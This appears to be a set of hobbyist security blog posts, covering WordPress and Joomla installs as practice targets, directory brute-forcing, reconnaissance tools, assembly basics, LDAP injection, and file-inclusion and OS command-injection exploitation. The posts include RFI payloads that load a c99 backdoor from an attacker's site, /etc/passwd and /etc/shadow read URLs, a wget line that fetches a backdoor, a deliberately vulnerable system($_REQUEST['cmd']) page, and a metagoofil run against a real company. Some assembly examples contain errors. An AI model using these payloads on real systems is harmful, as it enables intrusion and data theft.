Install Joomla and do the practice

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

We have installed wordpress which is really very very easy to install. Now i am going to show you to install JOOMLA . I think you are enough smart to understand that why we need joomla, wordpress or others things . Let’s start,

Download joomla from http://www.joomla.org/download.html

it is a zip file .Extract it same as WordPress i did.

We need to install apache2 php5-mysql libapache2-mod-php5 mysql-server

Some of them we already installed when installed the wordpress

So simply :

apt-get install  libapache2-mod-php5 
 Now We need to configure the mysql server for JOOMLA.

Here is the screenshoot:



Please write the command using your hand instead coping and pasting (hehe). You also see 3 Errors in this screen shot which is juice for a hacker. Whenever you give bad command you will get this error. 
We are ready to go,
Browse http://localhost/joomla/installation/  click “next” :


In the next stage you will see another windows and check if it has all dependency . Make sure:


OK click “Next”

Now it should display the license agreement , Again click “Next”


Now it should display a page for configuring database. So configure it like :


Warning: You should not use the root user for database if you are following this guide for business purpose.
OK now click ‘next’

Now you will get FTP server configuration. But if you wish to not use the ftp service then just click ” next” 



This is the last step:



Now just : rm -r /var/www/joomla/installation.
DONE!

Default Admin page http://localhost/administrator 




Good Luck!!!


Install WordPress(Default) and do the practice

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

You should not run any hacking tools or attempt to hack third party website which may brings some dangerous for you. Also some peoples even does not know how to create their own website for testing purpose or even for serious business. So i will explain that how we can install our own web software such as wordpress, phpbb, mybb, joomla etc. Installing these software is very easy. Let’s start.

(NOTE: You need these things to understand the things )

WordPress:

You need to install MySql, Apache, PHP, php-gd

currently i am using Kubuntu. If you are also running Kubuntu or Ubuntu then run :

apt-get install mysql-server php5 php-gd php5-mysql

Specify your mysql password. Remember Defaultly it will mysql root password (Be aware!!!).

Please download the wordpress from their site(http://wordpress.org/latest.zip) with command wget -c http://wordpress.org/latest.zip.

root@security:~/Desktop/Web software# cp wordpress-3.2.zip /var/www

root@security:~ /var/www# unzip wordpress-3.2.zip
root@security:~ /var/www# cp wordpress
Now we need to edit the “wp-config-sample.php”
First going to backup:
root@security:~ /var/www/wordpress# cp wp-config-sample.php wp-config.php

Now we edit ,

root@security:~ /var/www/wordpress# nano wp-config.php

we just need to edit some simple things:

define(‘DB_NAME’, ‘wordpress‘);

/** MySQL database username */
define(‘DB_USER’, ‘Insert_your_username_here‘);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘and_Password_of_Mysql‘);

Screenshot:

One question that are you sure that you have “wordpress” database name? I don’t think so. So create the database name otherwise installation will be failed:

GOOD !!! now you are ready to go …

Just visit : http://localhost/wordpress/wp-admin/install.php (OR IP) and you will see:

Simply fill up the forum and click on “install” button.

Good !! you just installed the wordpress :

 click on “Log in” button for wordpress administration .

Now enjoy, practice the security in your own site.

Next we will install “Joomla

Finding Hidden File and directory of target website

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Discovering hidden file and directory is important for hackers and penetration tester. There are many webmaster/developer who are keeping Default, configuration file, admin page, database page insecurely. For example , Many time I was able to read database page(such as db.sql), configuration page (such as confg.php) etc. But Some 10% clever developer try to rename these file too . Anyway, Finding hidden file is important technique of Information gathering and finding vulnerability.
We can do this by Brute force and dictionary attack but it may take very long time , Also the target get DDOSED.
How is it working: Imagine , Our target site is www.false.com . Simply it has a User login page www.false.com/admini for login users. But we need to find out the the real administrator page so that we can login to edit their site…right? We also tried manually(Several time) submiting some random url like www.false.com/admininstrator, or admni etc but no luck . Instead doing this manually we have tools to do this automated and fast. The tool will submit many random directory and file and we have to understand the HTTP respond code (Do you know about 400,403,200 etc?). This is not only for finding admin page but also for finding configuration file, interesting directory, default file/directory even vulnerability(So we can call it URL fuzzing) etc. 
Warning: Remember it will logged all error (error.log/error_log.log file). So Some worry for getting caught and DDOSED 
There are many tools such dirbuster, burpsuite or custom python scripts etc which we can download to be done this job. But I am going to show you the owasp DirBuster (Go to the owasp.org for download it).
When we open the DirBuster(java -jar dirbuster.jar) , we get :

I have installed Joomla locally(Directory: /var/www/joomla. So going to attack my own site like:
 
Here my target URL is 192.168.1.214 , I ticked the “Go Faster” so that it can attack too quickly. And the dictionary file(/pentest/web/dirbuster/directory-list-1.0.txt). I want to fuzz my joomla site and the joomla installed in /joomla directory(192.168.1.214/joomla) and default PHP file to be fuzzed.
At last Click on the “Start”.

Here we see Type, Found , Response, Size, Include and Status section.
“Type” is telling us that it is file or directory, The “Found” Section telling that DirBuster found somethings, Response mean it is 200=OK, 404=not found, 403=Forbidden etc, “Size” telling that how kb/mb the page or directory(Sometime it is interesting when very different size of the found page/directory), “Status” telling that if the tool is still working .
Now simple Browse the all Found File and directory . Sometime you may get blank page, For example, When I try to browse 192.168.1.214/joomla/configuration.php because it is not readable. If the fool developer or webmaster chmod it as read then he got fucked.

We see the output that DirBuster found the “administrator” page (joomla/administrator/index.php) and the configuration file(joomla/configuration.php) which are really intersting.
Perhaps we can do some malicious things like LFI, SQLi etc. Just think a little bit about it.
Let me know if you catch any mistake(I love to learn)….

Tools: metagoofil (File search)

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

All penetration tester and hackers search files against their target site because it is important for information gathering (Custom Password, Internal idea about the company etc?). Google is friend of hacker or penetration tester. They search using Google foo or automated tools  such as metagoofil. Metagoofile is good python script for doing such job.

How to use:

simply type in Terminal/Konsole ” ./metagoofil.py” and you will get all options to use it.

Also they gave some example to use it. But here is practical usage:

root@bt:/pentest/enumeration/google/metagoofil# ./metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsoftfiles -f results.html

It will start searching and will automatic download the specified file (Lol be aware).

Now try against your own site for practice purpose.

I don’t think that we need someone to learn to use tools.

Easy man … So try everything!!!

Tools: goohost

The site moved to root domain where all post are imported. Please go to http://pusheax.com/


Goohost is a simple Bash script to search(Google) information against the target website. It search IP, Subdomain and IP and email.

Usage example:

cd /pentest/enumeration/goohost

/pentest/enumeration/google/goohost# ./goohost.sh -t backtrack-linux.org -m ip -p 10 -v

Type ./goohost for helps…

How to exploit File Inclusion vulnerability

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

 File inclusion is also dangerous vulnerability. In any server site scripting language this vulnerable may appear but Most of time it appear in PHP script for some bogus code such as include, require_once  etc.

There two type File inclusion Vulnerability Remote File and  Local File Inclusion.

Remote File Inclusion Vulnerability:

Perhaps you heard about RFI=Remote File Inclusion which is really dangerous. If there are any RFI vulnerability exists then an attack(Hacker) may load some malicious scripts(Just think about IFRAME).

Suppose my target is :

www.bank.com/index.php?fool=developer

So somewhere in the “*.php” some kind of code like :

$fool = $_GET[‘fool’];
include( $fool . ‘.php’ );

So “include” will actually load > developer.php . But we can browse the site another malicious way because we are hacker. Suppose we hosted a c99.php backdoor in our own website(www.mysite.com/c99.php).  And now time to exploit like :

www.bank.com/index.php?fool=http://www.mysite.com/c99.php . If the target website load this page then  we can run command, Upload file etc.

Local File Inclusion:

LFI= Local File Inclusion same as RFI but it will load the local file of the target server.

For example :

www.bank.com/lfi.php?include=/etc/passwd

But Now my favorite linux does not allow you to write file or read /etc/shadow file with sudo/su power. But of course we can read other file such as mysql, error_file, writing some temp file etc.

Easy to understand?

Understanding The assembly language part 2

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I shortly explained some basic things and some instruction in the part 1. In this post i will discuss more about assembly language such as Variable, Array, Conditional, Loop etc. Remember, These post only for basic understanding of asm , not to be coder.

Variable:

Variable is data storage location. If you did the other programming language(You should before asm) then you know how variables work. Variable store some data to be used later when needed. I want to give you 3 example of these programming language.

1.Python example code:
 #!/usr/bin/env python

variable1 = 1337
 variable2 =”you are”  

print “This variable testing.
print “Now you  know what is variable because”, var1,var2

So here “variable1” and “variable2” is storing some data (value:1337 and “you are”). At last statement (print) called these two variables then it printed  “Now you know what is variable because you are 1337” . This is how variables work.



2. PHP example code:

<?php
$var1=”You are 1337″          //Note : PHP variables start with “$”
echo “Great !!! “;
echo $var;
?>



Here $var1 is the variable and storing the data “You  are 1337”.

OK, This how variables work for high level language but for assembly language it is very different. Suppose we want to add and subtract some numeric. here is the example:

.data
var1 dword 1000      ;Note: If it is string(A) then it should be like “A”(Quote)
var2 dword 337
var3 dword 1337
.code
mov eax,var1
add eax,var2
sub eax,var3




We know that all uninitialized in .data section. we need define the variable in the .data section.  So here i declared 3 variable var1,var2 and var3 and the value are var1=1000, var2=337, var3=1337.
So first we move the var1 value(1000) into eax register, then we add extra var2(337) so the eax register  value now “1337” , Again we subtract with var3(1337) value and now eax register became “0”. 

This is how variable works for assembly language. 






Array:

We know that array is a variable which hold multiple data/element in same data type. Suppose we have variable 



a=1
b=2
c=3
d=4


Instead declaring individual variable we can also do by a array like(Imagine), a=1,2,3,4.

We use array in C programming language within second bracket:

int something[5] = {1,2,3,4};



When we access to the data of an array then we code like this  “something[0]”…no?

Assembly is different . In assembly language does not accept {} and we need to declare an array in .data section. Such as ,

.data

array

……


Array is like variable . It just hold multiple value. So we need keep it on .data section…:

.data
array1 dword 1234,5678,9101h
.code
mov esi,array1+4  ;esi=5678
mov array1+0,esi  ;store 5678 in first element of array.
lea esi,offset[array1+8]  ; (Load address)remember it is 32 bit asm.

.
.
.


———-

Conditional:

Programming language allow us to take decision for True and False. Often we want to make conditional decision.

Imagine, >>If it you are true hacker>>>Then you are researcher>>If you are not true hacker>>>Then you are just a skid>>>So Skip here>>>No way and Close.



We can also make conditional decision for asm code (Example 1):

cmp eax,10 ;Comparing with 10
je target      ; If eax=10 then jump to target label

target:
       code
          .
          .
         mov esi,1337
        cmp esi,1337
                je, tart2
Example 2:

mov eax, 100
cmp eax,60
jg target3    ; jg=Jump if Greater





Some Conditional Jump instructions:

jnz = Jump if not zero (Zero Flag=0)
jns = Jump if not signed (Signed Flag=0)
jc = Jump if Carry (Carry flag=1)
jo= Jump if Overflow(Overflow=1)
jno=jump if not overflow (Overlow=0)

etc…






Looping

 

We know how a loop is work . In python we use like , “for loop in somewhere: start looping”. But In assembly there are only two specific instruction(Short details Below).

LOOPNZ Instruction(Loop if not zero): It will loop while the value ecx is greater than 0. 

example:

loopnz label1

LOOPNE Instruction(Loop If not equal): It is equipment to LOOPNZ and it share same opcode.



Now let’s discus about some extra things which we need to know… 





Data Related Operator:


I understand about 4 type of data operator below:

PTR operator : Suppose we want to move 16 bits of dword variable into a 16 bit register. Actually it is not allowed simply as it will not match because operand size does not match. So perhaps only possible way is “PTR” Operator.


.data
dwd dword 33333333h

.code
mov si, WORD PTR dwd  ;This is the way




Wrong:
.data 
dwd dword 33333333h



.code
mov si,dwd ; It will not work because Double word can’t store into 16 bit reg.




LENGHTOF OPERATOR:  LENGTHOF operator counts that how many elements in an array. Example:

.data
thisisthearray dword 10,11,12,13,14,15


.code

mov eax,LENGHTOF thisisthearray ;   So 6 elements in the “thisisthearray”  array




 
TYPE operator: TYPE operator simple check how much the size of a variable, array. Example:

.data
myvar dword “ethical”

.code
mov esi,TYPE myvar  ; The size is 8







SIZEOF operator: 

.data

arry WORD 16 DUP(0)
.code
mov eax,SIZEOF arry


ah How is working? “arry” has TYPE 2 and LENGHTOF 32. So it will be double , Mean eax=64. Because SIZEOF operator do multiple lenghtof by TYPE.




OK guys …. Now time to practices. Just do some google search, and read more. I just tried to explained(Sorry for bad English, i tried). I think that you are now interest to learn more about asm. So at last i recommended you to visit :



Some Instruction: Go here

Some code. Most of code for 16 bits but i believe you will understand the code clearly because you already know that different only “E” for example ax=eax. So  Go here


Just I try to read ASM code over and over and if i don’t understand any instruction or anything then i first start to search on Google. Perhaps this is how i am improving my assembly Language. 



Welcome any Feedback (sec00rit3y@gmail.com)

Understanding The assembly language part 1

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

First of all i am not expert coder of assembly language. I don’t write assembly code. But i believe having some knowledge about assembly language is advantage for developing exploit or finding software vulnerability because any debugger will output everything in ASM code. So if we can’t read it then we are unable understand what’s going on. I have explained here basic of Assembly language. 

Note: I am not master or teacher. I want to be a good student so that i can learn always. I am always interest to learn new thing or fixing my mistake. So if you found any mistake then please comment or email me so that i can fix myself. I believe sharing knowledge is increasing knowledge. 

———————————————————————————————————————

Data Definition:

 There are several type of data definition such as for 8 bits,16 bits,32bits,64bits etc. For each data there are specific definition:

BYTE : 8 bit unsigned integer. B stand for BYTE.
SBYTE : This is also 8 bit integer . But S mean signed. So s stand for signed. WORD : Word is 16 bit unsigned integer. 
SWORD: S stand for signed. SWORD is 16 bit signed integer.
DWORD: DWORD mean Double word. Mean word+word=DWORD.
SDWORD: Hope you can understand that it is Double word but signed.


Example:
variable1 BYTE ‘Z’                            ;This is 8 bits and unsigned value ‘Z’
variable2 BYTE ‘-2’                            ; This is 8 bits and signed value ‘-2’
variable3 WORD ‘TEST’                    ; This is 16 bits unsigned which is defined as ‘WORD’
variable4 WORD -23255                     ; This is singed WORD
variable5 DWORD 11133314h           ; This Double word unsigned example.
variable6 SDWORD -35964939          ; Signed Double word.

 ASSEMBLY LANGUAGE REGISTERS:

 Registers are used for store binary data. Of course , These all registers have specific purpose. 
There are eight 32 bit general purpose registers , Six segment registers, A processor status flag registers and an instruction pointer. By these registers program execute. 
32 bit general purpose Registers:

EAX (It is called Extended Accumulator  Registers):  EAX  used by Multiplication and Division instruction. 

ECX (It is called Extended Count) : CPU atomically uses ECX as loop counting .

EBX (Extended Base Register): It can be used for storing data.

EDX (Extended Data Register): EDX allows for complex calculation.

EBP ( Extended Base/Frame Pointer Register): Used for Local variable on the stack.

ESI and EDI (Extended Source index Register and Extended Destination Register ): This two registers used by high speed memory transfer instruction.

ESP (Extended Stack Pointer): Address data on the stack.

Segment Registers: 

SS (Stack Segment): Pointer to the stack.

CS(Code Segment): Pointer To the code.

DS(Data segment): Pointer to the data.

ES(Extra Segment): Pointer to the Extra data.

FS(F Segment): Pointer to the more extra data.

GS(G Segment): Pointer to the more and more data. 


EIP(Instruction Pointer): It will hold an address for next instruction to execute.






DATA MOVEMENT AND INSTRUCTIONS:

MOV Instruction:

MOV instruction Copy data from source to destination. The format is :

mov dest, src

load src data into dest. So clearly the src is moving to to destination(dest).


MOV can do :

mov register, register
mov registers, memory
mov memory, register
mov memory, immediate
mov immediate,memory

example:
.data
myexample dword ?
myexample2 dword ?
.code
mov eax, myexample             ;Move myexample variable into eax
mov myexample2,eax            ; move eax data in myexample2





MOVZX instruction:

This instruction (zero Extend) will Copy the content from source to destination and zero extend the values to 16 or 32 bits.


Example:

 .DATA

val1 dword 0A9dLdkAh
.code
mov bx,val1     ;ax=0A9dLdkAh
movzx eax,bx  ;eax=0A9dLdkAh



MOVSX instruction:
Movsx instruction move the signed data. The ‘S’ is stand for signed. 



The LAHF instruction:
LAHF mean “Load  Status Flags into AH “


Example:

 .daTa                               ;This is no problem. Because asm is not case 
saveme BYTE ?
                                       ; sensitive.

.code
lahf
mov saveme, ah             ; All status flags are saving in a  variable




Instruction SAHF( Store AH into Status Flags ):

Example:

.data
samevar BYTE ?
.code
mov ah,samevar
sahf


XCHG(Exchange data) :

Example: 

xchg eax, ebx  

ADD instruction:


Add instruction add source to destination (1+1=2) .


Example:

.data
variable1 dword 5000h
variable2 dword 6000h

.code
mov eax, variable1
add eax, variable2


What’s going on here? Simple, First we must need to move the variable1(5000h) data in eax register so that we can add second data. Then it is varable2(6000h) has added and became eax= 11000h.






SUB instruction:


This instruction will subtract source data from destination. 

Example:

.data
myvariable dword 11111111h
myvariable2 dword 11111111h

.code
mov eax, myvariable
sub eax, myvariable2


Same as ADD instruction just it is subtracting 11111111h from 11111111h (eax=0).










INC instruction:
INC instruction increment/add 1 from a single register or memory.

Example:

.data
myvariable dword 11111111h
.code
mov eax, myvariable
inc eax 

First i moved the the variables data in eax then it incremented 1(eax=11111112). It can be directly incremented also (inc myvariable).

DEC instruction:
Same as INC instruction but it decrement 1 

Example:

.data
myvariable dword 10000001
.code
dec myvariable 

So what happened ? Simple , it just decremented 1 from the memory(became myvariable=10000000)  





JMP Instruction: jmp=jump instruction will jump to destination . For example:

label:                                      ;label works like function.
         all code goes here.
         jmp label                        ; This will repeat endless.













LOOP instruction: Hey, How about Python looping ? Don’t remember ? 

for love in hacking:
                          print “This is the loop”



I think the same is here also . But it is more easy to understand. Example:

.data
looper DWORD ?                              ; o_o why “?” It is space keeping data.
.code
mov ecx,200
label:
       mov looper,ecx
       loop label                           ;Go back to label













POP instruction: First POP instruction copies the data from Stack pointed by ESP then it Increment ESP. 


Example:

pop ebx













POPFD Instruction: popfd pops the stacks into eflags.







PUSH INSTRUCTION: push instruction decrement extended stack pointer(esp) then copy the source into stack. example:
 

.code
push ebx













CALL instruction: This instruction just will call the new memory location. For example:

.code
mov ebx,data
call esp



So first it storing “data” into ebx register and the next instruction is calling the esp(lol shellcode?).







There are many instructions … Please google search them how it works ? Frankly, Google is my first and best master. 


Anyway, Hope these discussion gave you some hint about assembly language. In part 2 i will discuss about variable, array, function etc. 


Oh , Don’t forget to mail me if you catch any mistake here…please(sec00rit3y@gmail.com).



So to be continued guys …
 






















































LDAP injection!!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

LDAP=Lightwieght Directory Access protocol. This protocol is used to accessed directory server over network which use port number 389.

If you don’t know about LDAP then here you go: http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol

LDAP also store name, credit card,email  and other information. LDAP also exploitable like other database. LDAP injection is similarly to SQL injection.

NOTE: Remember i am telling you what i do. So feedback is welcome. I am not master and i don’t want to be master.

Suppose there web site which is allow us to search the website. So i simply put “*“on the search field and click on the search button . If it is really dealing with LDAP then it will match with all directory and output all information on the page.

If it is a URL then it would be like: www.example.com/search.asp?vulnerable=*

Simple way to identify the vulnerability (Bad Input):

*
)(cn=*

))))

*))

Reference:
https://www.owasp.org/index.php/LDAP_injection
https://www.owasp.org/index.php/Testing_for_LDAP_Injection_%28OWASP-DV-006%29

Try more…

Hacking is not crime, It is philosophy, It is research!!! 

OS command Injection vulnerabity

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

“OS=Operating System” command injection vulnerability is a high impact vulnerability for server/website.  If any website has OS command injection vulnerability Then a malicious hacker can compromise the website or even the server operating system. If a hacker can detect the vulnerability then he can run any Operating system command. For example, If i run the command “rm -r /var/www”  on my computer then it is going remove “www” but what if i run this command on my victim’s computer ?

How we detect this vulnerability:

Suppose our target address is www.victim.com/vultest/lame.php

And the source code:
<html>
<body>
<title>Vulnerable Page</title>
<p><b>We will test  OS command injection vulnerability against this pages. Actually developer don’t know how serious the code is.</b></p>

<p><b>Output of command:</b></p>
<?
system($_REQUEST[‘cmd’]);
?>

<p><b><i>This is how OS command injection vulnerability works.</i></b></p>

In that page the php code also:

<? system($_REQUEST['cmd']); ?>


(This is white box... Just copy it and paste into a php web page for practice purpose.)

This is the OS injection vulnerability. For this simple mistake anyone can run any os specific command against the server/website.  


So If we run a simple command "ping" :





We get reply on the page (Also other contents). In real world test we may not see the reply but it delay some time(4-10 seconds?). If this is the case then we can run any command "ls" .

If any of these statement in the source code:

Exec
system
passthru
shell_exec
proc_open
pcntl_exec



Then it is highly doubt that the site is vulnerable.


Suppose we don't have source code then how we test? Way is fuzzing(Tools, Manually). Sometime we call it black box testing.

To test it we need to write some code for fuzzing purpose or we can use ready tools which are freely downloadable from internet such as burp suit, wfuzz, vulnerability scanner, manually by your hand etc.  I think you have logic for automated testing otherwise get some "False" result by your lam0 tools...






Exploitation : 


Note: Doing it on localhost


http://localhost/vultest/lame.php?cmd=ls 

It output:


db.php
lame.php
login.php
password.txt
test1


We can run any command:


http://localhost/vultest/lame.php?cmd=cat /etc/passwd
http://localhost/vultest/lame.php?cmd=cat /etc/hosts
http://localhost/vultest/lame.php?cmd=cat /etc/shadow (Require root)
http://localhost/vultest/lame.php?cmd=cp /db/to/mysql /here
http://localhost/vultest/lame.php?cmd=cat wget 192.168.1.212/bacdoor.php

etc.   

I hope i explained it and now we know what is it and how it can be exploited by hackers. But really it is very basic, you need to be more advance.

Let me know(sec00rit3y@gmail.com) if you have any questions.

Good luck !!!